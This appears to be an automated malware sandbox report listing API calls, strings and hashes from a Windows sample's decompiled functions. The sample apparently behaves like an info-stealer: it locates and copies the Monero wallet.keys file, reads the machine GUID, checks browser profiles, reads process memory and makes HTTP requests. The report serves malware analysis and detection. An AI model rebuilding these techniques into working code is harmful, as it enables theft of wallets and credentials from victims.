Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006153AA: lstrlenA.KERNEL32(?), ref: 00615441
Part of subcall function 006153AA: StrCmpCA.SHLWAPI(?,00647A3B,00647A3A,00647A37,00647A2F), ref: 006154B0
Part of subcall function 006153AA: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 006154D2

SelectObject.GDI32(?,?), ref: 00623D18
DeleteObject.GDI32(?), ref: 00623D33
DeleteObject.GDI32(?), ref: 00623D3C
ReleaseDC.USER32(00000000,00000000), ref: 00623D44
CloseWindow.USER32(00000000), ref: 00623D4B

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 1802806997-0
Opcode ID: a0a407341cf3990f9b82a642d7948fef31a1d4cde9133cee29af982073ce417b
Instruction ID: e45748fdd13becd96466c63852089e4a91489d628c84a80d69b4e3723cd053dd
Opcode Fuzzy Hash: a0a407341cf3990f9b82a642d7948fef31a1d4cde9133cee29af982073ce417b
Instruction Fuzzy Hash: B251E776801618BFDF11AFA0ED49DEEBF7AFF49311B004025FA01E2160DB399955DBA1

Function 00628F92 Relevance: 18.1, APIs: 8, Strings: 2, Instructions: 592networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006228AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006113A9), ref: 006228BB
Part of subcall function 006228AF: HeapAlloc.KERNEL32(00000000,?,?,?,006113A9), ref: 006228C2
Part of subcall function 006228AF: GetUserNameA.ADVAPI32(00000000,006113A9), ref: 006228D6

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

CloseHandle.KERNEL32(00000000,?,?,?,?,00629D6E), ref: 00629007
OpenEventA.KERNEL32(001F0003,00000000,?,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00629013
CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00629D6E), ref: 00629024
CreateDirectoryA.KERNEL32(?,00000000,00647803), ref: 00629249
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00629307
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 0062931A

Part of subcall function 006225FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00622631
Part of subcall function 006225FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00622671
Part of subcall function 006225FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 006226C6
Part of subcall function 006225FE: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 006226CD

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 00614A56: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00614AF5
Part of subcall function 00614A56: StrCmpCA.SHLWAPI(?), ref: 00614B13

Part of subcall function 006256FF: StrCmpCA.SHLWAPI(?,block,?,?,00629377), ref: 00625714
Part of subcall function 006256FF: ExitProcess.KERNEL32 ref: 0062571F

Part of subcall function 00615E61: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00615F00
Part of subcall function 00615E61: StrCmpCA.SHLWAPI(?), ref: 00615F1E

Part of subcall function 00624DE6: strtok_s.MSVCRT ref: 00624E05
Part of subcall function 00624DE6: strtok_s.MSVCRT ref: 00624E88

Sleep.KERNEL32(000003E8), ref: 006296C8

Part of subcall function 00615E61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006160B6
Part of subcall function 00615E61: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 006160FA
Part of subcall function 00615E61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0061612C

Part of subcall function 00624387: SHFileOperationA.SHELL32(?), ref: 006243BD

Part of subcall function 00628D90: SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 00628DB4
Part of subcall function 00628D90: wsprintfA.USER32 ref: 00628DD5
Part of subcall function 00628D90: FindFirstFileA.KERNEL32(?,?), ref: 00628DEC
Part of subcall function 00628D90: _mbscmp.MSVCRT ref: 00628E13
Part of subcall function 00628D90: _mbscmp.MSVCRT ref: 00628E2B
Part of subcall function 00628D90: _splitpath.MSVCRT ref: 00628E66
Part of subcall function 00628D90: _ismbcupper.MSVCRT ref: 00628EB3

CloseHandle.KERNEL32(?), ref: 006297C6

Part of subcall function 00629A4C: _memset.LIBCMT ref: 00629A71
Part of subcall function 00629A4C: _memset.LIBCMT ref: 00629A80
Part of subcall function 00629A4C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00629A95
Part of subcall function 00629A4C: ShellExecuteEx.SHELL32(?), ref: 00629C35
Part of subcall function 00629A4C: _memset.LIBCMT ref: 00629C44
Part of subcall function 00629A4C: _memset.LIBCMT ref: 00629C56

Strings

abc_, xrefs: 00628FC7
93e4f2dec1428009f8bc755e83a21d1b, xrefs: 0062933F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: InternetOpen$Heap_memsetlstrcpy$FileProcess$AllocCloseCreateDirectoryEventHandleName_mbscmpstrtok_s$ConnectExecuteExitFindFirstFolderHttpInformationModuleOperationOptionPathRequestShellSleepUserVolumeWindows_ismbcupper_splitpathlstrcatlstrlenwsprintf
String ID: 93e4f2dec1428009f8bc755e83a21d1b$abc_
API String ID: 2811409911-4023705059
Opcode ID: 8b5603f75ce2187c831c3a83449991bb9b04ce79cc2831f1383032be6aff97b9
Instruction ID: f3695669d1387ff1c24e4caeae516079c85ef94478c0a2d9433c3e274fb958f0
Opcode Fuzzy Hash: 8b5603f75ce2187c831c3a83449991bb9b04ce79cc2831f1383032be6aff97b9
Instruction Fuzzy Hash: D932AF729087519BC6A0FB25E847A8EF7E6BFC0300F45091EFA8857261DB305A59CF97

Function 00628615 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 0061688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 006168F1
Part of subcall function 0061688F: StrCmpCA.SHLWAPI(?), ref: 0061690B
Part of subcall function 0061688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0061693A
Part of subcall function 0061688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00616979
Part of subcall function 0061688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006169A9
Part of subcall function 0061688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006169B4
Part of subcall function 0061688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006169D8

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

StrCmpCA.SHLWAPI(?,ERROR), ref: 00628669
lstrlenA.KERNEL32(?), ref: 00628674

Part of subcall function 00623A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00628680,?), ref: 00623A93

StrStrA.SHLWAPI(00000000,?), ref: 00628689
lstrlenA.KERNEL32(?), ref: 00628698
lstrlenA.KERNEL32(00000000), ref: 006286B1

Strings

ERROR, xrefs: 006286CD
ERROR, xrefs: 006286C6
ERROR, xrefs: 006286BC
ERROR, xrefs: 00628663
ERROR, xrefs: 006286D4

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: 1b1902f034a0052542cae9dfcf5f972b037f7e3c0198550a41d5e0eb5024cef4
Instruction ID: 34e27667a129964e1206e2c5bcc4c01265c04fd7ba39d1f4a8e46c2309c9cb42
Opcode Fuzzy Hash: 1b1902f034a0052542cae9dfcf5f972b037f7e3c0198550a41d5e0eb5024cef4
Instruction Fuzzy Hash: 0121D631901925ABCB50BF34EC4A99D7BBAAF01351B144069FD01A71A2DF349A418FD8

Function 0061FABD Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(8D5052FC), ref: 0061FB02
StrCmpCA.SHLWAPI(8D5052FC), ref: 0061FB79
StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 0061FE8D
StrCmpCA.SHLWAPI(8D5052FC), ref: 0061FC6F

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

StrCmpCA.SHLWAPI(8D5052FC), ref: 0061FD20
StrCmpCA.SHLWAPI(8D5052FC), ref: 0061FD97

Strings

Stable\, xrefs: 0061FDB2
firefox, xrefs: 0061FE87
Stable\, xrefs: 0061FB94

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: 3dedc4773dadda46613be7a26261ca28cf52a94356aff56abf3358b6b319a5c4
Instruction ID: 3fd1ea7a461b78260b8db224995eee6da3d539fd6e60f49284caef6a9dc08ebc
Opcode Fuzzy Hash: 3dedc4773dadda46613be7a26261ca28cf52a94356aff56abf3358b6b319a5c4
Instruction Fuzzy Hash: E7C18E32D0051AABCB50FB78ED47ACD7776BF44310F550124EE04AB251EB34AB688BD6

Function 00611AA8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00611ACC

Part of subcall function 00611A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00611A55
Part of subcall function 00611A41: HeapAlloc.KERNEL32(00000000), ref: 00611A5C
Part of subcall function 00611A41: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00611AD9), ref: 00611A79
Part of subcall function 00611A41: RegQueryValueExA.ADVAPI32(00611AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00611A94
Part of subcall function 00611A41: RegCloseKey.ADVAPI32(00611AD9), ref: 00611A9D

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00611AE1
lstrlenA.KERNEL32(?), ref: 00611AEE
lstrcatA.KERNEL32(?,.keys), ref: 00611B09

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

CopyFileA.KERNEL32(?,?,00000001), ref: 00611C1A

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

DeleteFileA.KERNEL32(?), ref: 00611C8D

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

Strings

.keys, xrefs: 00611AFD
\Monero\wallet.keys, xrefs: 00611B1F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 615783205-3586502688
Opcode ID: 881bc6cf010f5d8069f153b92f47cf28e68666ccaee7f8b6e374c244dca07ee2
Instruction ID: 288825696517a1bd77526100ff60bf6f36f76b7a7304c756d34f567fee4dfb31
Opcode Fuzzy Hash: 881bc6cf010f5d8069f153b92f47cf28e68666ccaee7f8b6e374c244dca07ee2
Instruction Fuzzy Hash: 9D513C71E4012E9BCF60AB65EC56ADD737AAF04314F4404E8B70877152DA316FD58F88

Function 0062187B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 006218A0
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 006218CC
_memset.LIBCMT ref: 00621911
ReadProcessMemory.KERNEL32(?,00000000,?,00000208,00000000), ref: 00621976
_memset.LIBCMT ref: 00621A02
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00621A63

Part of subcall function 0062045E: _memmove.LIBCMT ref: 00620478

Strings

N0ZWFt, xrefs: 006219BF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process_memset$MemoryOpenRead_memmove
String ID: N0ZWFt
API String ID: 1717157771-431618156
Opcode ID: e3dde4ba26dc281ef7d59bdf873d5f14cbc5a69ac197b1b378c1014e4805134e
Instruction ID: 592f4baed72bcd2fb43c84f4c75508c890047ac66eb7ba0d6ceaa0f40bda7f3d
Opcode Fuzzy Hash: e3dde4ba26dc281ef7d59bdf873d5f14cbc5a69ac197b1b378c1014e4805134e
Instruction Fuzzy Hash: 0F5196B1D046289FDF20AF509D857ED77BAAB55304F0000FAA319AB242DA716EC88F58

Function 00623230 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00623263
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00623282
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 006232A7
RegCloseKey.ADVAPI32(?,?,?,?), ref: 006232B3
CharToOemA.USER32(?,?), ref: 006232C7

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00623278
MachineGuid, xrefs: 0062329C

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: cf532d7cc08553a2caab121761ec46b863dd5977e87475818e52529a71a3c123
Instruction ID: 65e8b76067d29485824bdf0fc50685b020f7a0d15ab3ba9bf51aebea52872c76
Opcode Fuzzy Hash: cf532d7cc08553a2caab121761ec46b863dd5977e87475818e52529a71a3c123
Instruction Fuzzy Hash: 70111EB590132DAFDB10DB60ED89EEBB7BDEB04304F0001E5A659E2152DB749E888F50

Function 00611A41 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00611A55
HeapAlloc.KERNEL32(00000000), ref: 00611A5C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00611AD9), ref: 00611A79
RegQueryValueExA.ADVAPI32(00611AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00611A94
RegCloseKey.ADVAPI32(00611AD9), ref: 00611A9D

Strings

wallet_path, xrefs: 00611A8C
SOFTWARE\monero-project\monero-core, xrefs: 00611A6F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: 516aa6dcae527b6e28f4983363094c91ebbe9f412c43429405a00a985166add3
Instruction ID: 19f1091cf33a2cb3aa45f09edaef7f30f09a91ddd146aff65f1f5ee07a6e20c4
Opcode Fuzzy Hash: 516aa6dcae527b6e28f4983363094c91ebbe9f412c43429405a00a985166add3
Instruction Fuzzy Hash: 4CF03A75280308BFEB109BA0DC0AFAA7A69FB45B02F100064B701A5190DBB4AA409660

Function 00627B46 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00627BD5

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

lstrcatA.KERNEL32(?,00000000), ref: 00627BF2
lstrcatA.KERNEL32(?,?), ref: 00627C11
lstrcatA.KERNEL32(?,?), ref: 00627C25
